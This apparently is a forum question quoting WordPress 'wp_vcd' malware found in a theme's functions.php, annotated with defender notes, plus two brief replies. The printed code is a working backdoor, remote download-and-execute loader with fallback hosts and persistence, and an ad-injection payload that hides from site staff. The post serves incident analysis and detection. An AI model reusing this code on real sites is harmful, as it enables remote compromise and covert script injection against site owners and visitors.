
I found the following code in a child theme's functions.php. Even if I delete it, it regenerates automatically.

// --- Remote-update backdoor ---------------------------------------------------
// Runs on every request, before WordPress proper. A request that supplies
// `action` and `password` through $_REQUEST (GET, POST or cookie, per
// request_order) with the hard-coded value below is allowed to rewrite this
// file in place. The check is a loose `==` and the secret sits in plaintext in
// the theme itself, so it protects the operator's control channel, not the site.
// Defender note: the responses `true` and `ERROR_WP_ACTION WP_V_CD WP_CD`, and
// requests carrying `action=change_domain` / `action=change_code`, are
// distinctive strings to search for in access logs and response captures.
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '39790f7c9b39216528df57a9c6c72032')) {
    $div_code_name = "wp_vcd"; // family marker; assigned but never read in this block
    switch ($_REQUEST['action']) {
        // `case ...;` with a semicolon is accepted by PHP exactly like `case ...:`.
        case 'change_domain';
            if (isset($_REQUEST['newdomain'])) {
                if (!empty($_REQUEST['newdomain'])) {
                    // Re-read this very file so it can be patched and written back.
                    if ($file = @file_get_contents(__FILE__)) {
                        // Find the current download host inside the loader's own
                        // `$tmpcontent = @file_get_contents("http://<host>/code.php` line.
                        // `.` does not match newlines, so the capture is the host on
                        // the first such line (the facocs.com line in the loader below).
                        if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {
                            // Replace every occurrence of that host with the request-supplied
                            // value. The captured host is interpolated into the pattern
                            // without preg_quote(), so its dots act as wildcards, and the
                            // replacement is written unvalidated. This is the mechanism for
                            // re-pointing the loader once a download host is taken down.
                            $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                            @file_put_contents(__FILE__, $file); // write failure is silenced by `@`
                            print "true";
                        }
                    }
                }
            }
            break;
        case 'change_code';
            if (isset($_REQUEST['newcode'])) {
                if (!empty($_REQUEST['newcode'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        // Swap everything between the `//$start_wp_theme_tmp` and
                        // `//$end_wp_theme_tmp` marker comments for the request-supplied
                        // `newcode` (stripslashes() undoes magic-quotes-style escaping).
                        // Those markers are not visible in the excerpt as posted; if the
                        // real file lacks them too, this branch matches nothing and prints nothing.
                        if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {
                            $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
            break;
        default:
            // Unknown action: fixed error string (useful as a detection signature).
            print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }
    // Control requests never reach WordPress; the response is just the text above.
    die("");
}
// Family marker and a copy of this file's path. Neither variable is read
// anywhere in the code visible here.
$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
// --- Loader -------------------------------------------------------------------
// Guarded by function_exists() so that an identical copy in the parent theme's
// functions.php (the payload below touches both) does not cause a redeclare
// fatal. Everything here runs on every front-end request.
// Defender note: artifacts this block creates or depends on are
// functions.php (child and parent theme), wp-includes/wp-tmp.php,
// <active theme>/wp-tmp.php and ./wp-tmp.php in the current directory.
if (!function_exists('theme_temp_setup')) {
    // `REQUEST_URI` is an unquoted bare constant: a notice on PHP 7 and an
    // Error on PHP 8. `$path` is never read in this listing.
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    // Skip cron and XML-RPC requests. The loose `== false` would also match a
    // hit at position 0, which cannot occur for a URI that starts with `/`.
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        // cURL fallback for hosts where allow_url_fopen is disabled: follows
        // redirects, returns the body only. The URLs passed in are plain HTTP,
        // so the download is neither authenticated nor protected in transit.
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        // Download-and-execute. Writes "<?php\n" + $phpCode to a temp file,
        // includes it (running the remote code), deletes it, and returns every
        // variable the payload defined so the caller can extract() them. If the
        // system temp dir is not writable it falls back to the current directory
        // (the web root under WordPress). Because the file is unlinked at once,
        // on-disk evidence of each run is short-lived; the persistent copies are
        // the wp-tmp.php writes further down.
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            if (fwrite($handle, "<?php\n" . $phpCode)) {
            } else {
                $tmpfname = tempnam('./', "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
            }
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        // A fetched payload is executed only if it contains this tag, which
        // distinguishes the operator's code from e.g. a parked-domain page.
        // (The key quoted in wp-tmp.php below differs from this one by two
        // transposed characters; possibly a transcription difference in the post.)
        $wp_auth_key = '0bb00640fa54049fc4c2c5e080f9f51a';
        // Three download hosts are tried in order (.com, .pw, .top). On success the
        // payload is run via theme_temp_setup() and its variables extract()ed into
        // this scope, then a copy is persisted to wp-includes/wp-tmp.php, falling
        // back to the active theme directory and finally the current directory.
        // The inner `if` repeats the outer key check and is redundant.
        if (($tmpcontent = @file_get_contents("http://www.facocs.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.facocs.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        } elseif ($tmpcontent = @file_get_contents("http://www.facocs.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
            // Second host; same execute-then-persist sequence as above.
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        } elseif ($tmpcontent = @file_get_contents("http://www.facocs.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
            // Third host; same execute-then-persist sequence as above.
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            // Offline fallbacks: when every remote fetch fails, the cached copies
            // written above are executed instead, so the site stays infected even
            // while the download hosts are down or blocked at the firewall.
            extract(theme_temp_setup($tmpcontent));
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        }
    }
}

I don't understand exactly what it does yet. It seems to download PHP code from some website and put it in wp-includes/wp-tmp.php.

Here's the content of wp-includes/wp-tmp.php:

// --- Payload header (wp-tmp.php) ----------------------------------------------
// Silence all error output first, so the notices the sloppy code below would
// raise (undefined variables and indexes) never reach the page or the logs.
ini_set('display_errors', 0);
error_reporting(0);
// The loader only executes a payload that contains its own key. This value
// differs from the loader's ('...f9f51a') in two characters, so as quoted one of
// the two is most likely a transcription error in the post.
$wp_auth_key = '0bb00640fa54049fc4c2c5e080f95f1a';
// Read functions.php of both the parent (template) and child (stylesheet) theme.
$file        = file_get_contents(get_template_directory() . '/functions.php');
$filec       = file_get_contents(get_stylesheet_directory() . '/functions.php');
// Domain rotation: rewrite the loader's download host from $rep to $repw in
// whichever functions.php still contains it. This is the same idea as the
// loader's `change_domain` action, driven from the payload instead. As quoted,
// the loader above uses facocs.* hosts, so this particular pair would not
// match it.
$rep         = "dacocs.top";
$repw        = "dacocs.xyz";
if (stripos($file, $rep) !== false) {
    $new_file = str_replace($rep, $repw, $file);
    @file_put_contents(get_template_directory() . '/functions.php', $new_file);
}
if (stripos($filec, $rep) !== false) {
    $new_filec = str_replace($rep, $repw, $filec);
    @file_put_contents(get_stylesheet_directory() . '/functions.php', $new_filec);
}
// --- Injection payload --------------------------------------------------------
// Guarded so that the parent- and child-theme copies do not redeclare functions.
// Defender note: signatures visible here are the cookie names
// `wordpress_cf_adm_use_adm` and `sevisitor`, the file wp-includes/wp-feed.php,
// and the two external script URLs in the page output.
if (!function_exists('slider_option')) {
    // the_content filter: on single-post views appends two external <script>
    // tags to the post body. `$con` is assigned but never used.
    function slider_option($content)
    {
        if (is_single()) {
            $con     = '
';
            $con2    = '

<script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1610264"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1610267&interactive=1&pushup=1"></script>

';
            $content = $content . $con2;
        }
        return $content;
    }
    // wp_footer action: echoes the same two script tags on every non-single page.
    function slider_option_footer()
    {
        if (!is_single()) {
            $con2 = '

<script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1610264"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1610267&interactive=1&pushup=1"></script>

';
            echo $con2;
        }
    }
    // Sets a ~1000-day cookie for logged-in users. The name mimics a WordPress
    // cookie; its only use below is to exclude that browser from the injection,
    // so site staff never see the injected scripts (cloaking).
    function setting_my_first_cookie()
    {
        setcookie('wordpress_cf_adm_use_adm', 1, time() + 3600 * 24 * 1000, COOKIEPATH, COOKIE_DOMAIN);
    }
    if (is_user_logged_in()) {
        add_action('init', 'setting_my_first_cookie', 1);
    }
    // Users who can edit others' pages get their client IP appended to
    // wp-includes/wp-feed.php. If the file does not exist `$ip` is undefined
    // (notice suppressed by the header) and the address is still written.
    // That file is the second exclusion list used below; it is also, in effect,
    // an inventory of staff IPs — collect it before cleanup.
    if (current_user_can('edit_others_pages')) {
        if (file_exists(ABSPATH . 'wp-includes/wp-feed.php')) {
            $ip = @file_get_contents(ABSPATH . 'wp-includes/wp-feed.php');
        }
        if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false) {
            $ip .= $_SERVER['REMOTE_ADDR'] . '
';
            @file_put_contents(ABSPATH . 'wp-includes/wp-feed.php', $ip);
        }
    }
    // Referrer check: a visitor whose HTTP_REFERER contains one of these
    // fragments is tagged with a 120-second `sevisitor` cookie. HTTP_REFERER
    // may be absent (undefined index, suppressed).
    $ref = $_SERVER['HTTP_REFERER'];
    $SE  = array(
        'google.',
        '/search?',
        'images.google.',
        'web.info.com',
        'search.',
        'yahoo.',
        'yandex',
        'msn.',
        'baidu',
        'bing.',
        'doubleclick.net',
        'googleweblight.com'
    );
    foreach ($SE as $source) {
        if (strpos($ref, $source) !== false) {
            setcookie("sevisitor", 1, time() + 120, COOKIEPATH, COOKIE_DOMAIN);
            $sevisitor = true;
        }
    }
    // The scripts are attached only for visitors who lack the staff cookie, are
    // not logged in, are not in the wp-feed.php IP list, and arrived via one of
    // the referrers above (or already carry the sevisitor cookie). `$sevisitor`
    // is undefined on the other path; the loose `== true` treats null as false.
    if (!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) {
        $adtxt = @file_get_contents(ABSPATH . 'wp-includes/wp-feed.php');
        if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false) {
            if ($sevisitor == true || isset($_COOKIE['sevisitor'])) {
                add_filter('the_content', 'slider_option');
                add_action('wp_footer', 'slider_option_footer');
            }
        }
    }
}

Has anybody encountered something like this before?

  • Looks like it injects ads and it makes sure it's not displayed when a search engine bot visits the site. It has a few fallback domains to get the code from and has a function to update text in itself (such as any of the domain names) to something else in case the domain name is taken down. Very common in WordPress themes downloaded from random sites or that have a low amount of downloads on the official WordPress site. – Technidev Apr 05 '18 at 02:10
    Hi, what is your question? – multithr3at3d Apr 05 '18 at 02:32
